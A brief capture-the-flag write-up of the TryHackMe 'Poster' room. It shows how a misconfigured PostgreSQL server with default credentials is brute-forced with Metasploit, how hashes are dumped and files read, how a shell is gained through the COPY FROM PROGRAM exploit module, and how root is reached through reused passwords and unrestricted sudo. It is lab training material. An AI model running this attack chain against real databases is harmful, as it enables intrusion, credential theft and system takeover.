TryHackMe | Poster Writeup

This room is more focused on PostgresSQL on how misconfiguration could lead to Remote Code Execution.

NMAP SCAN

Always do recon, recon is the way to win. Take notes of versions.

Findings

Web (Port 80)

  1. Apache 2.4.18
  2. No robots.txt

Not much was found, but always run a directory scanner in case there are any hidden files on the web.

DB (Port 5432)

  1. We can pentest this port
    psql -h <host> -U <username> -d <database> # Remote connection
  2. We can enumerate user credentials using Metasploit.
    auxiliary/scanner/postgres/postgres_login

Found valid credentials :
[+] 10.10.94.103:5432 - Login Successful: postgres:password@template1

3. We can use another module to execute commands.
auxiliary/admin/postgres/postgres_sql
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit

4. Now we can try dumping some hashes using another module
auxiliary/scanner/postgres/postgres_hashdump

5. We can also read files using a module
auxiliary/admin/postgres/postgres_readfile

6. We can also run another module for command injection.
exploit/multi/postgres/postgres_copy_from_program_cmd_exec

We now have a shell.

Privilege Escalation

  1. Found credentials in config.php
  1. User Dark cannot run sudo
  2. DB password is reused for user alison, we are now user alison
  3. Check sudo -l
    User alison may run the following commands on ubuntu: (ALL : ALL) ALL
  4. Simply run sudo /bin/bash for easy root.

Student that loves FOSS